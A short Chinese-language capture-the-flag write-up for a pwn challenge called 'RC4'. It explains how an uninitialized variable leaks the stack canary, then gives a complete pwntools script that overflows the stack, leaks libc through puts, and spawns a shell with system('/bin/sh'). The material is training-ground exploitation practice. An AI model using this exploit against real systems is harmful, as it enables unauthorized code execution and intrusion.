RC4
首先,檢查一下程序的保護機制
然後,我們用IDA分析一下,存在棧溢出漏洞
由於開啓了canary,因此,我們需要泄露canary,由於低位覆蓋泄露出來的信息是加密的,解密可能比較麻煩,我們另選其他方法。功能a裏有一個不起眼的漏洞
後面,輸出了v7的內容
然而,v6和v7僅僅在dword_6020CC = 0時被初始化,如果它們未初始化,其值會是什麼?
如果v7未初始化,其值就是canary的值。
因此,我們就用這種方法來泄露canary,然後就是正常的棧溢出操作
#coding:utf8
from pwn import *
from LibcSearcher import *
sh = process('./rc4')
#sh = remote('111.198.29.45',31957)
elf = ELF('./rc4')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x4010BB
pop_rdi = 0x401283
def Generate_Key(c):
sh.sendlineafter('>','a')
sh.sendlineafter('>',c)
def Do_Encode(content):
sh.sendlineafter('>','b')
sh.sendline(content)
def Exit():
sh.sendlineafter('>','d')
sh.sendline()
Generate_Key('b')
Generate_Key('d')
data = sh.recvuntil('\n')[16:]
length = len(data)
canary = ''
for i in range(length-1,-1,-2):
canary += data[i-2:i]
canary = int(canary,16)
print 'canary=',hex(canary)
payload = 'a'*0x108 + p64(canary) + p64(0) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
Do_Encode(payload)
Exit()
sh.recvuntil('> ')
#泄露puts的地址
puts_addr = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00'))
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
print 'libc_base=',hex(libc_base)
payload = 'a'*0x108 + p64(canary) + p64(0) + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
Do_Encode(payload)
Exit()
sh.interactive()